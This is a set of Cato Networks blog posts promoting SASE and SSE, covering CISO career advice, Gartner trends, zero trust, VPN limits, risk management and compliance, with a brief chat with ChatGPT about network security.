100% security means 0 functionality, and vice versa
Strategic CISOs understand this and set themselves up for success by working with the CEO and board to minimize exposure and establish realistic KPIs of success.
Establishing Your Metrics of Success in the CISO Role
What makes CIOs so successful in their role?
A single metric of success: 5 9s.
This allows CIOs to focus on the R&R necessary to achieve this goal.
Suggested CISO KPI & KPI Setting Process
Run an analysis to see how many attempted attacks take place weekly at the organization, to establish a benchmark.
Provide an executive report with weekly attack attempt metrics (i.e., 300.)
Create a proposed benchmark of success: i.e., preventing 98% of attacks.
Get management signoff on your proposed KPIs.
Provide weekly reports to executives with defined attack metrics: attempted weekly attacks + prevented.(Ensuring security incidents are promptly reported to C-suite and board.)
Adjust KPIs as necessary and receive management signoff.
Mind the Gap: Bridge Your Current Technical and Business Gaps
Recommended Technical Education
GIAC / GSEC Security Essentials
CISSP (Certified Information Systems Security Professionals)
OR CISM (Certified Information Security Manager) CertificationOR CISA (Certified Information System Auditor) Certification
SASE (Secure Access Service Edge) Certification
SSE (Security Service Edge) Certification
Recommended Technical Experience
At least 3-5 years in IS, Cybersecurity, Networking or IT with a strong security focus
Recommended Business Education
An MBA or equivalent business degree, or relevant business experience
CPA or accounting courses
Recommended Business Experience
Approximately 3-5 years of business experience
Business Operations, Business Management, SOC Manager, or roles that demonstrate your business, management and leadership acumen
Recommended Understanding Of:
Industry security standards including NIST, ISO, SANS, COBIT, CERT, HIPAA.
Current data privacy regulations, e.g., GDPR, CCPA and any regional standards.
How to Get a CISO Job with Limited or No Previous Experience
It’s the age-old dilemma – how do I get a job without relevant experience? And how to I get relevant experience without a job?
Take On a Virtual CISO Role at a Friend or Family Member’s Small Business
Offer 3 hours of virtual CISO service a week.
In exchange, ask for 3 recommendations a month and to service as a positive reference.
Can you receive mentorship from an existing CISO?
Do friends, family or former colleagues know any CISOs you can connect with? Start there.
Reach out on LinkedIn to CISOs and invite them to coffee or dinner.Ask them if you can meet up and receive mentorship over dinner once a month (they pick the location, and you pay.)
Remember: It’s a numbers game. Don’t get discouraged after a few “no's” or a lack of responses.
Getting Your First CISO Job: Your Action Plan for Career Success
Applying For Jobs
Your resume has one and only one goal – to get you the interview.Week 1:
Send out 20 resumes for CISO jobs with your existing resume
How many respond and request interviews (within 2 weeks)?
If you get under a 50-70% success rate, you need to revise your resume.
Your goal is to repeat this process until you get a minimum of 10 positive responses for every batch of 20 resumes you send out (giving recruiters 1.5 - 2 weeks to respond.) Be ready to adapt and adjust your resume as many times as necessary (using the defined process above,) until you hit your benchmarks of success.
Revising your Resume for Success
If you’re not hitting a 50-70% interview rate on your resume, it’s time to revise your resume.But what do you change?
The Most Common Mistakes Found on CISO Resumes (Don’t Fall into a Trap)Your resume should not only highlight your technical abilities but your business acumen.Review the strategic skills highlighted earlier and emphasize those (in addition to any other relevant educational, professional, or career achievements.)
Have you briefed executives and boards?
Have you given effective presentations?
Have you created risk management programs and aligned the entire organization?
Do you lead an online forum on Cybersecurity best practices?
Think of ways to highlight your business and leadership savvy, not just your de facto technical abilities.
The Interview Rounds
The CISO interview process is generally between 5-7 interview rounds.
Remember:The goal of your first interview is only to receive a second interview. The goal of your second interview is to receive a third interview, and so on. Be prepared for interviews with legal, finance, the CEO, CIO, HR, and more.
You’ve Got This: The Road to Landing Your First CISO Role
Abraham Lincoln once said, “the best way to predict the future is to create it.” And we hope this guide gives you a running start towards your new and exciting future as a CISO. We believe in you and your future success. Good luck! And feel free to forward this guide to a friend or colleague who’s hunting for a new CISO role, if you feel it’s been helpful.
Life After Landing the Coveted CISO Role
Congrats! You’ve Been Hired as a CISO
You did it. You’ve landed your first CISO role. We couldn’t be prouder of the hard work and dedication that it took to get you to this point. Before you begin in your new role, here are a few best practices to guide you on your way to career success.
Ensuring Your Success in the CISO Role: Things to Keep in Mind
After speaking with 1000s of CISOs since 2016, it’s important to keep the following in mind:
Your Network Security Architecture Will Determine Your Focus and Impact
No matter the organization or the scope, your CISO role is dependent on meeting if not exceeding your promised KPIs. So, you’ll need to decide, do you want a reactive or a proactive security team? Do you want your team to spend their time hunting and patching security vulnerabilities and mitigating disparate security policies? Or devoted to achieving your larger, revenue-generating missions through cybersecurity? Accordingly, you’ll need to ensure that your network security architecture minimizes your enterprise’s attack surface, so you and your team can devote your attention accordingly.
To achieve this, your team must have full visibility and control of all WAN, cloud, and internet traffic so they can work on fulfilling your business objectives through cybersecurity. Otherwise, your function will revert to tactical, instead of focusing on serving as a business enabler through cybersecurity.
Cato SSE 360 = SSE + Total Visibility and Control
Disjointed security point solutions overload resource constrained security teams, impacting security posture, and increasing overall risk due to configuration errors. Traditional SSE (Security Service Edge) convergence mitigates these challenges but offers limited visibility and control that only extends to the Internet, public cloud applications, and select internal applications. Thus, leaving WAN traffic uninspected and unoptimized. And an SSE platform that isn’t part of single-vendor SASE can’t extend convergence to SD-WAN to complete the SASE transformation journey.
Cato Networks’ SSE 360 service will allow you to solve this. SSE 360 optimizes and secures all traffic, to all WAN, cloud, and internet application resources, and across all ports and protocols. For more information about Cato’s entire suite of converged, network security, please be sure to read our SSE 360 Whitepaper. Complete with configurable security policies that meet the needs of any enterprise IS team, see why Cato SSE 360 is different from traditional SSE vendors.
Gartner has just issued a press release announcing its Top Trends Impacting Infrastructure and Operations for 2023. Among the six trends that will have significant...
December 12, 2022
Gartner Names Top I&O Trends for 2023 Gartner has just issued a press release announcing its Top Trends Impacting Infrastructure and Operations for 2023. Among the six trends that will have significant impact over the next 12 to 18 months Gartner named the Secure Access Service Edge (SASE), sustainable technology, and heated skills competition.
Below is a discussion of these trends and how they are interrelated.
Secure Access Service Edge (SASE) was created by Gartner in 2019 and has repeatedly been highlighted as a transformative category. According to Gartner’s press release, “SASE is a single-vendor product that is sold as an integrative service which enables digital transformation. Practically, SASE enables secure, optimal, and resilient access by any user, in any location, to any application. This basic requirement had been fulfilled for years by a collection of point solutions for network security, remote access, and network optimization, and more recently with cloud security and zero trust network access. However, the complexity involved in delivering optimal and secure global access at the scale, speed, and consistency demanded by the business requires a new approach.
Gartner’s SASE proposes a new global, cloud-delivered service that enables secure and optimal access everywhere in the world. Says Gartner analyst Jeffrey Hewitt: “I&O teams implementing SASE should prioritize single-vendor solutions and an integrated approach.” SASE’s innovation is the re-architecture of IT networking and network security to enable IT to support the demands of the digital business.
[boxlink link="https://www.catonetworks.com/resources/inside-look-life-before-and-after-deploying-sase/?utm_medium=blog_top_cta&utm_campaign=before_and_after_sase"] An Inside Look: Life Before and After Deploying a SASE Service | Whitepaper [/boxlink]
This is the tricky part about SASE: while the capabilities, also offered by legacy point solutions, are not new, the platform architecture is brand new. To deliver scalable, resilient, and global secure access that is also agile and fast, SASE must live in the cloud as a single holistic platform.
SASE architecture also has a direct impact on the competition for skills. When built from the ground up as a coherent and converged solution delivered as a service, SASE is both self-maintaining and self-healing. A cloud-native SASE platform delivered “as a service” offloads the infrastructure maintenance tasks, from the IT staff. Simply put, a smaller IT team can run a complex networking and network security infrastructure when supported by a cloud-native SASE provider, such as Cato Networks. The SASE provider maintains optimal security posture against emerging threats, seamlessly upgrades the platform with new capabilities, and reduces the time to detect, troubleshoot and fix problems. Using the right SASE platform, customers will also alleviate the pressure to acquire the right skills to support and maintain individual point solutions, and the resources needed to “keep the lights on” by maintaining a fragmented infrastructure in perfect alignment and optimal posture.
Beyond skills, SASE also has a positive impact on technology sustainability. Cloud-native SASE service eliminates a wide array of edge appliances including routers, firewalls, WAN optimizers and more. By moving the heavy lifting of security inspection and traffic optimization to the cloud, network edge footprint and processing requirements will decline, reducing the power consumption, cooling requirements, and environmental impact of edge appliance disposition.
The road to simpler, faster, and secure access starts with a cloud-native, converged, single vendor SASE. Customers can expect better user experience, improved security posture, agile support of strategic business initiatives, and a lower environmental impact.
In one artificially cold evening, I invited myself to an intimate fireside chat with my new BFF, ChatGPT, who I now call CG in short. ...
Fireside Chat About Network Security With ChatGPT (AI) In one artificially cold evening, I invited myself to an intimate fireside chat with my new BFF, ChatGPT, who I now call CG in short.
Being a new artificial intelligence open to help humans as myself understand the universe we live in, I wanted to pick its brain (or should it be brains, in plural?) about a topic close to my heart.
I opened asking:
Can I ask you a few questions about network security?
And CG answered:
Sure, I would be happy to help with any questions you have about network security. As a large language model trained by OpenAI, I have been trained on a wide range of text and I can generate human-like responses based on the input that I receive
What are the common components in network security?
CG knew it right away:
There are several common elements that are often found in network security, including:
Firewalls: These are devices or software programs that control incoming and outgoing network traffic based on predetermined security rules.
Encryption: This is the process of encoding data so that it can be transmitted securely and only accessed by authorized users.
Access control: This refers to the policies and procedures that regulate who or what is allowed to access specific network resources.
Intrusion detection and prevention: These are systems that monitor network traffic for signs of malicious activity and take action to prevent or respond to attacks.
Virtual Private Networks (VPNs): These are networks that use encryption and other security measures to create a secure connection over a public network, such as the internet.
Security patches and updates: Regularly applying security patches and updates to network devices and software is essential for closing vulnerabilities and keeping networks secure.
[boxlink link="https://catonetworks.easywebinar.live/registration-enhancing-your-enterprise-network-security-strategy?utm_medium=blog_top_cta&amp;utm_campaign=enhancing_network_security_webinar"] Enhancing Your Enterprise Network Security Strategy | Webinar [/boxlink]
With all those components traditionally being on-premises, I asked:
What are the limitations of on-premises security products?
CG seemed to know exactly where I was going with this:
The limitations of on-premises security products can vary depending on the specific product and the context in which it is used. However, some common limitations of on-premises security products include:
High upfront cost: On-premises security products often require a significant upfront investment, including the cost of hardware, software, and installation. This can be a barrier for organizations with limited budgets.
Limited scalability: On-premises security products are typically designed for a specific number of users or devices, and adding additional users or devices can be challenging and costly. This can make it difficult for organizations to keep pace with growing needs.
Dependence on local infrastructure: On-premises security products are typically installed and operated on the organization's own servers and networks, which can create dependencies on local infrastructure. If there are problems with the local infrastructure, it can affect the availability and performance of the security product.
Maintenance and support: On-premises security products require ongoing maintenance and support, which can be time-consuming and costly. Organizations may need to hire specialized staff or contract with third-party service providers to provide this support.
Limited flexibility and agility: On-premises security products are often inflexible and can be slow to adapt to changing needs and requirements. This can make it difficult for organizations to respond quickly to new threats or opportunities.
Overall, the limitations of on-premises security products can make them less suitable for organizations that need to scale quickly, are constrained by budgets, or require high levels of flexibility and agility.
I wanted to know a bit more, so asked:
What about remote users? Where does ZTNA fit in here?
As you can imagine, CG is never caught off guard:
Remote users are individuals who access a network or its resources from outside the organization's physical location. In terms of network security, remote users present unique challenges, as they are often accessing the network over a public network such as the internet, which can be vulnerable to attacks.
One way to address these security challenges is through the use of a Zero Trust Network Architecture (ZTNA), which is a network security model that assumes that all users, regardless of location, are untrusted until they have been authenticated and authorized. With ZTNA, access to network resources is strictly controlled and only granted on a need-to-access basis. This approach can help to protect against a wide range of security threats, including those posed by remote users.
CG was starting to complain that I was asking too many questions too quickly, so I felt it was time to wrap it up with one final question:
Can you explain what is SASE and why it is important to digital enterprises?
CG was kind (and wise), and answered me this:
SASE, or Secure Access Service Edge, is a new approach to networking and security that is gaining popularity in the digital enterprise world. It is important because it combines networking and security functions into a single, cloud-based service, which offers several advantages over traditional networking and security approaches.
One of the key benefits of SASE is that it allows organizations to connect users and devices securely to any application or service, no matter where they are located. This means that employees can access the resources they need to do their job, even if they are working remotely or on-the-go. This can help improve productivity and enable organizations to support a remote and mobile workforce.
Another advantage of SASE is that it provides a more flexible and scalable approach to networking and security. Traditional networking and security solutions are often complex and inflexible, making it difficult for organizations to adapt to changing business needs. With SASE, organizations can easily add or remove users and devices, and scale their network and security capabilities up or down as needed.
Finally, SASE can help organizations reduce their networking and security costs. Because SASE is delivered as a cloud-based service, organizations don't have to invest in expensive hardware and software to set up and manage their networking and security infrastructure. This can help organizations save money and reduce the burden on their IT teams.
Overall, SASE is important to digital enterprises because it offers a more flexible, scalable, and cost-effective approach to networking and security.
I am not sure what the future holds for AI and for humanity, and whether there’s a place on earth for both of us, but for now, chatting with an AI is just fun.
Thank you, CG (https://chat.openai.com/)
As companies look to reduce corporate risk, protect against data breaches and other incidents, and maintain regulatory compliance, a zero trust security strategy provides significant...
Cloud-Based Security is Well-Suited for Zero Trust Architectures As companies look to reduce corporate risk, protect against data breaches and other incidents, and maintain regulatory compliance, a zero trust security strategy provides significant advantages when compared to legacy models.
However, zero trust is only effective if it is enforced and supported by strong security solutions. For most organizations, cloud-based solutions are the only means of supporting a secure, high-performance, and scalable zero trust architecture.
Effective Zero-Trust is Resource-Intensive
The zero trust security model was designed to address the inadequacies of traditional, castle-and-moat security. Under this legacy security model, all insiders are implicitly trusted and granted unrestricted access to corporate assets, while traffic crossing the boundary of the corporate network is considered suspect and subject to inspection. As cloud adoption and remote work become more common and cyber threat actors grow more sophisticated, this model is increasingly ineffective.
Zero trust security says that no one, internal or external, should be implicitly trusted. Instead, requests for access to corporate resources are considered on a case-by-case basis. Additionally, access controls are defined based on the principle of least privilege, minimizing access and limiting the potential impact of a compromised account.
However, while zero trust provides much better security than legacy models, it comes at the cost of additional resource consumption. Unlike virtual private networks (VPNs) used by the legacy security models, zero-trust network access (ZTNA) solutions must evaluate each access request against role-based access controls and other criteria. Additionally, authenticated users are monitored throughout their session for potential threats or risky actions, and these sessions are terminated as needed.
As corporate networks grow and traffic volumes expand, network security resource requirements increase as well. Without the right infrastructure, applying robust protections to growing networks without sacrificing network performance can be difficult.
[boxlink link="https://catonetworks.easywebinar.live/registration-enhancing-your-enterprise-network-security-strategy?utm_medium=blog_top_cta&utm_campaign=enhancing_network_security_webinar"] Enhancing Your Enterprise Network Security Strategy | Webinar [/boxlink]
Why Zero Trust Should Be Built In the Cloud
Historically, corporate security architectures have been deployed on-prem as part of a castle-and-moat security model. However, in the modern network, this increasingly causes network latency and performance degradation as traffic is backhauled to a central location for inspection.
As organizations work to implement zero-trust security across their entire IT infrastructures, security architectures should move to the cloud. Cloud-native security solutions provide numerous benefits. Including:
Asset Locations Agnostic: Companies are increasingly moving applications and data storage to the cloud, and the adoption of Software as a Service (SaaS) solutions contributes to this trend. Deploying security in the cloud means that it is close to where an organization’s applications and data are located, reducing the network latency and performance impacts of security inspection.
Greater Scalability: Cloud-native ZTNA solutions have the ability to scale to meet demand. Like microservices, additional instances can be deployed or allocated as needed to handle growing traffic volumes or computationally intensive security inspection.
Global Reach: As companies embrace remote or hybrid work models, employees may spend part or all of their time outside of the office. A ZTNA solution deployed as part of a global network can minimize latency impacts on user requests by bringing security near the network edge.
As corporate networks grow larger and more distributed, security must be scalable and not geographically constrained by the location of an organization’s on-prem infrastructure. Cloud-based — and more specifically cloud-native — security is essential to implementing effective zero-trust security without sacrificing network performance and employee productivity.
Implementing Zero Trust with SSE and SASE
A globally distributed, cloud-native ZTNA solution can meet the access control requirements of a corporate zero trust security program. However, effective zero trust is more than simply implementing least privilege access controls for all access requests. Once a user has authenticated, their entire session should be monitored for suspicious or malicious activities that could place the organization at risk.
To accomplish this, an organization requires additional security capabilities, such as a next-generation firewall (NGFW), an intrusion prevention system (IPS), a secure web gateway (SWG), and a cloud access security broker (CASB). Hosting these capabilities on-prem eliminates the benefits of cloud-based ZTNA as it forces traffic to be backhauled for security inspection and imposes the same scalability limitations of on-prem appliances. Effective zero trust requires a fully cloud-native network security stack.
Security Service Edge (SSE) and Secure Access Service Edge (SASE) are ideally suited to implementing zero trust security for the growing corporate WAN. SSE and SASE solutions integrate ZTNA functionality with a full network security stack, including Firewall as a Service (FWaaS), IPS, SWG, and CASB. SASE goes a step further, incorporating SD-WAN and network optimization capabilities as well. Deployed as a global, cloud-native solution, SSE and SASE implement a scalable, high-performance zero trust architecture.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud makes building a zero trust security architecture that grows with the business easy by signing up for a free demo today.
Computers have become a core component of the modern company. Many employees spend most or all of their workdays on them, interacting with a variety...
Your Employees Need High-Performance, Secure Internet Access (and Aren’t Getting It) Computers have become a core component of the modern company. Many employees spend most or all of their workdays on them, interacting with a variety of different pieces of software. To do their jobs, employees need high-performance, secure access to corporate networks and IT assets. This is true whether an employee is working from the office or from off-site.
As remote and hybrid work schedules become more common, companies are deploying secure remote access solutions, such as virtual private networks (VPNs) to support them. However, this often means making tradeoffs between the performance of remote workers’ network connectivity and its security.
High-Performance Internet Access is Essential for the Modern Business
In the past, most of an organization’s employees worked on-site. This meant that they were connected directly to the headquarters network and protected by its perimeter-based security solutions. However, in recent years, a growing percentage of an organization’s employees are working from outside the office. Companies have adopted remote and hybrid work policies in response to the COVID-19 pandemic and to take advantage of the global workforce. At the same time, corporate IT assets are increasingly moving to the cloud. Software as a Service (SaaS) and cloud-native applications can offer improved performance, availability, and scalability for an organization’s employees and customers.
As a result of these shifts, the corporate LAN is becoming increasingly irrelevant as it hosts a diminishing percentage of an organization’s IT assets. However, the headquarters network is also where an organization’s security solutions are located and where the traffic is routed. Remote workers need high-performance network access to corporate networks and resources. Yet the design of many modern corporate networks means that this is not always a reality.
[boxlink link="https://www.catonetworks.com/resources/why-remote-access-should-be-a-collaboration-between-network-security/?utm_medium=blog_top_cta&utm_campaign=remote_access_collab"] Why remote access should be a collaboration between network & security | Whitepaper [/boxlink]
Where Legacy Secure Remote Access Falls Short
With a growing percentage of corporate workforces working on remote or hybrid schedules, a secure remote access VPN is essential. In many cases, companies are reliant on VPNs to provide this capability. Legacy VPN solutions are simply not designed to meet the needs of the modern enterprise.
Some of the primary ways in which they fall short include:
Inefficient Routing: Remote access VPNs are designed to route remote workers’ traffic to a VPN server, which is typically located on the corporate headquarters network. However, with a growing percentage of companies’ IT assets not located on-prem, this creates inefficient routing that degrades network performance and increases latency.
Inadequate Security: From a security perspective, all that a VPN does is provide an encrypted tunnel over which traffic is sent between the remote worker and the corporate network. Protecting against cyber threats and implementing a zero-trust security policy requires additional solutions alongside or instead of the VPN servers, which increases the cost and complexity of an organization’s IT infrastructure and limits its scalability.
VPNs were designed to implement a perimeter-focused security model where most of an organization’s IT assets were located on the headquarters network and needed to be protected against external threats. But this security model is no longer effective.
As a result, employees and companies are suffering from poor network performance in their remote access solutions as they try to use legacy secure remote access solutions to implement an outdated security model for a network architecture that no longer exists.
Choosing Both Performance and Security
VPNs’ design and lack of built-in security forces a tradeoff between network performance and security. Routing remote workers’ network traffic through the headquarters network for security inspection creates inefficient routes and network latency for remote users and cloud-based assets. Allowing remote users to connect directly to cloud-based assets, which provides the network performance that companies need, bypasses perimeter-based security stacks and leaves the organization at risk due to VPNs’ lack of built-in security.
Avoiding the tradeoff between network performance and security requires replacing legacy VPNs with a modern remote access solution. Secure Access Service Edge (SASE) provides numerous benefits over VPNs, including:
Cloud-Native Design: SASE solutions are deployed on globally distributed points of presence (PoPs). This allows them to be deployed geographically near an organization’s IT assets, reducing network latency, and enables them to take full advantage of the benefits of the cloud, such as scalability and availability.
Zero-Trust Access Control: SASE solutions integrate secure remote access capabilities in the form of zero-trust network access (ZTNA). This allows them to implement zero-trust access controls for remote users, a capability that VPNs do not share.
Integrated Security: SASE solutions combine ZTNA with a full network security stack and network optimization capabilities. Integrating security solutions with ZTNA eliminates the need for standalone security solutions alongside a VPN endpoint and enables direct connectivity to cloud-based assets without backhauling traffic to an on-prem security architecture or sacrificing security for network performance.
Corporate networks and business needs are evolving, and VPNs are not keeping up. Cato SASE Cloud, the world’s most mature single-vendor SASE platform, provides companies with the ability to support their remote workers with high-performance, secure network access. Learn more about improving the performance and security of your corporate WAN by signing up for a free demo of Cato SASE Cloud today.
Cybersecurity is all about risk management. Companies are faced with numerous, diverse cyber threats, and the job of the corporate security team is to minimize...
November 29, 2022
SASE is the Right Choice for Cyber Risk Management Cybersecurity is all about risk management. Companies are faced with numerous, diverse cyber threats, and the job of the corporate security team is to minimize the risk of a data breach, ransomware infection, or other costly and damaging security incident.
Cybersecurity tools and solutions are designed to help companies to achieve this goal of managing enterprise security risk. Of the many options out there, Secure Access Service Edge (SASE) is ideally suited to supporting all aspects of a corporate cyber risk management program.
Companies Face Significant Cyber Risks
Cybersecurity has become a top-of-mind concern for most businesses. Data breaches and ransomware attacks occur on a regular basis, often with price tags in the millions of dollars. Avoiding these incidents is essential to the profitability and survival of the business. With the growth of automated attacks and an “as a Service” cybercrime economy, the bar to entry into the cybercrime space has fallen. As cybercrime groups grow more numerous and sophisticated, any organization can be the target of a devastating attack.
Risk treatment strategies
Companies facing growing levels of cybersecurity risk need to take steps to manage these risks. In general, companies have four tools for risk treatment strategies: mitigation, transference, avoidance, and acceptance.
Risk treatment by mitigation focuses on reducing the risk to the organization by implementing security controls. For cybersecurity risks, this could include patching vulnerable systems or deploying threat prevention capabilities that can identify and block attempted attacks before they reach vulnerable systems.
SASE solutions are ideally suited to threat mitigation due to their global reach and convergence of many security functions — including a next-generation firewall (NGFW), intrusion prevention system (IPS), cloud access security broker (CASB), zero-trust network access (ZTNA), and more — within a single solution. By consistently enforcing security policies and blocking attacks across the entire corporate WAN, SASE dramatically reduces an organization’s cybersecurity risk.
[boxlink link="https://catonetworks.easywebinar.live/registration-enhancing-your-enterprise-network-security-strategy?utm_medium=blog_top_cta&utm_campaign=enhancing_network_security_webinar"] Enhancing Your Enterprise Network Security Strategy | Webinar [/boxlink]
Transference involves handing over responsibility for managing risk to a third-party provider. A common form of risk transference is taking out an insurance policy. In the event that an organization experiences a risk event — such as a cyberattack — the insurance provider takes on most or all of the cost of remediating the issue and restoring normal operations.
As a managed service, SASE can be useful for risk transference because much of the responsibility for implementing a strong security program is the responsibility of the service provider, rather than the organization. For example, maintaining the security stack — a process that can require in-depth network understanding and security expertise — is outsourced with the Firewall as a Service (FWaaS) capabilities of managed SASE deployments.
By enabling an organization to implement a mature security program and improving corporate security visibility and threat prevention, managed SASE makes it easier for organizations to get cybersecurity insurance. This is especially important with the rising risk of ransomware attacks, as insurance providers are implementing increasingly stringent security requirements for organizations to take out security policies.
In some cases, cybersecurity risks that an organization may face are avoidable. For example, if a particular vulnerability poses a significant risk to an organization’s security, the choice to stop using the vulnerable component eliminates the risk to the organization. Avoidance-based risk treatment strategies can be highly effective, but they can come with opportunity costs if a secure alternative is not available for a vulnerable component.
SASE supports risk avoidance by offering a secure alternative to legacy network security solutions. Historically, many organizations have relied on a castle-and-moat security model supported by virtual private networks (VPNs) and similar solutions. However, these models have significant shortcomings, not least the rapid dissolution of the network perimeter as companies adopt cloud computing, remote work, Internet of Things (IoT), and mobile devices.
SASE solutions help to avoid the risks associated with legacy, castle-and-moat security models by supporting granular application-based protection. With zero-trust network access (ZTNA) built into SASE solutions, organizations can avoid the security risks associated with legacy VPNs, such as poor access management.
Completely eliminating all risk is impossible, and, in some cases, the return on investment of additional risk treatment may be too low to be profitable. Companies need to determine the level of risk that they are willing to accept — their “risk appetite” — and use other risk treatment methods (mitigation, transference, and avoidance) to reduce their risk down to that level.
Ensuring that accepted cyber risk is within an organization’s risk appetite requires comprehensive visibility into an organization’s IT infrastructure and the risks associated with it. SASE provides global visibility into activities on the corporate WAN, and built-in security solutions enable an organization to gauge their exposure to various cyber threats and take action to manage them (via firewall security rules, CASB policies, and other controls) or intelligently accept them.
Cybersecurity Risk Management with Cato
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how your organization can manage its cyber risk exposure by signing up for a free demo of Cato SASE Cloud today.
Regulatory compliance is a major concern for many organizations. The risks and costs of non-compliance are numerous, including brand damage, regulatory penalties, and even the...
November 24, 2022
Addressing Regulatory Compliance Challenges for the Distributed Enterprise Regulatory compliance is a major concern for many organizations. The risks and costs of non-compliance are numerous, including brand damage, regulatory penalties, and even the inability to perform business-critical activities, such as processing payment card data.
Digital transformation and the evolution of the regulatory landscape can pose significant compliance challenges for organizations. In most cases, the legacy security technologies designed for primarily on-prem, castle-and-moat security models are no longer enough for security. Maintaining regulatory compliance in the face of digital transformation requires security solutions designed for modern IT environments.
Companies Face Significant Compliance Challenges
Every company is subject to several regulations. Common examples include employer laws, privacy regulations (such as the GDPR), and financial regulations (such as SOX). While this has been true for some time, the complexity of achieving and maintaining regulatory compliance has grown significantly in recent years. Two of the major contributors are the changing regulatory landscape and the expansion of corporate IT networks.
An Evolving Regulatory Landscape
Within the last few years, the regulatory landscape has grown increasingly complex. Companies have long been subject to regulations such as the Payment Card Industry Data Security Standard (PCI DSS, which protects the data of payment card holders, and the Health Insurance Portability and Accessibility Act (HIPAA), a US regulation for protected health information (PHI).
However, the enactment of the General Data Protection Regulation (GDPR) within the EU has set off a surge in new data privacy laws. The GDPR defined many new rights for data subjects, and laws based upon it, such as the California Consumer Privacy Act (CCPA) and its update the California Privacy Rights Act (CPRA), implement these and other rights to varying degrees.
The patchwork of new regulations makes it more difficult for companies to achieve, maintain, and demonstrate compliance. At the same time, existing regulations, such as PCI DSS, are undergoing updates to keep up with evolving data security threats and IT infrastructure.
The Increasingly Distributed Enterprise
Regulatory compliance has also been complicated by the growing distribution of the modern enterprise. The move to cloud computing means that companies may not know where their sensitive data — potentially covered under various regulations — is being stored and processed. The growth of remote work means that employees may be downloading and processing user records in jurisdictions with different data privacy laws.
Some regulations, such as the GDPR, prohibit the transfer of constituents’ data outside of countries with “adequate” data privacy laws, a requirement that might be violated by the use of cloud computing and support for remote work. Companies may also struggle to ensure that mandatory security controls are in place for data stored on devices and infrastructure outside of their control.
It is much harder to maintain compliance with digital transformations: data is all over the place (or the world) and so are users. The way to overcome this is to use a solution that ensures that the organization has global network visibility and the ability to enforce corporate policy across its entire IT infrastructure.
[boxlink link="https://www.catonetworks.com/resources/why-remote-access-should-be-a-collaboration-between-network-security/?utm_medium=blog_top_cta&utm_campaign=remote_access_collab"] Why remote access should be a collaboration between network & security | Whitepaper [/boxlink]
Legacy Remote Access Technology No Longer Works
Historically, companies have implemented a perimeter-focused security model. Initially, this ensured that traffic moving between the corporate network and the public Internet was inspected and secured. As companies expanded to the cloud and remote work, network traffic between remote sites was backhauled to a central location for inspection and enforcement before being routed to its destination.
Correctly implemented, this model may give an organization the visibility and control that it requires for compliance. However, it does so at the cost of network performance and scalability. As corporate networks expand, a growing volume of traffic must pass through the central inspection point.
Growing traffic volumes place additional strain on network and security solutions and add to the network latency impacts on cloud-based software and remote users. Additionally, as virtual private networks (VPNs), the solutions used to implement these castle-and-moat designs, lack any built-in access controls or security capabilities, centralized security architectures require multiple standalone solutions, making them complex and expensive to scale to meet demand.
Maintaining Regulatory Compliance Despite Enterprise Expansion
The limitations of VPNs and legacy security architectures have inspired the zero trust security movement. Implementing a zero trust security model at scale requires solutions capable of enforcing access controls across an organization’s entire IT infrastructure without sacrificing network performance or visibility.
The right way to accomplish this is with a zero trust architecture that is cloud-native and globally available. Cloud-native security solutions can acquire additional resources as needed, allowing them to scale with the business and growing traffic volumes. Additionally, cloud-native security services are available everywhere that an organization’s users and data are, decreasing the performance impacts of regulatory compliance and security.
With the right zero trust architecture, there is no need to compromise or balance between business growth and regulatory compliance. Strong, scalable security meets regulatory requirements, and global visibility and automated data collection and report generation simplify regulatory compliance. Security Service Edge (SSE) and Secure Access Service Edge (SASE) provide the zero trust security architecture that enterprises need to achieve regulatory compliance. By converging networking and network security functionality into a cloud-native solution, SASE moves security tools needed for dynamic regulatory compliance to the cloud.Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about simplifying network security and regulatory compliance with Cato SASE Cloud by signing up for a free demo today.
Amit Spitzer, Cato Networks’ CISO, shares his tried and true methods for succeeding as a CISO, while simultaneously balancing both security needs and business requirements....
November 21, 2022
How to Become a Successful CISO: Advice from Amit Spitzer, Cato Networks’ CISO Amit Spitzer, Cato Networks’ CISO, shares his tried and true methods for succeeding as a CISO, while simultaneously balancing both security needs and business requirements.
After more than 15 years in security and IT, I can honestly recommend the CISO position to security or IT professionals who are looking for a demanding, yet satisfying, position. Whether you’re implementing a new technology that will help mitigate zero-day attacks or consulting the board about the security impact of an M&A, there’s rarely a dull moment in the life of a CISO. In this post, I have put together my top tips for being a successful and effective CISO, based on my own experience. I hope you find it helpful on your own career path. For a tactical and hands-on guide to becoming CISO, take a look at our blog post, “The 5-Step Action Plan to Becoming CISO”.
Before You Begin: Why Do You Want to Become a CISO?
The first step to becoming a CISO is getting clear on why you want to become one. Whether you’re planning to be a CISO at a disruptive technological company or a paper manufacturing facility, the underlying role and responsibilities of the CISO are ultimately the same: protecting the organization from bad actors who are trying to get their hands on sensitive data. If reading this description got your heart beating faster, then security is the right domain for you. Within security, the difference between a C-level security professional (a CISO) and other security professionals is the vision. A CISO envisions how she or he will impact the company’s goals and milestones, contribute to the company’s interests and protect its assets. While this keeps many a CISO up at night, it is also exciting and exhilarating, since you are involved in major company milestones, like IPOs. Are you ready to actively participate in these types of business activities? If the answer is ‘yes’, you’re in the right CISO mindset.
[boxlink link="https://catonetworks.easywebinar.live/registration-94?utm_medium=blog_top_cta&utm_campaign=ciso_perspective_masterclass"] A CISO’s Perspective on Security | Cybersecurity Master Class: Episode 5 [/boxlink]
Starting Your CISO Journey: Taking a Hands-On Approach
In the past, CISOs from legacy enterprises focused on building the organization. This first generation of CISOs was not involved in technologies. Instead, they set the stage for today’s CISOs, who are in the trenches and taking a hands-on technical approach, while also contributing to business-related goals, like their predecessors.
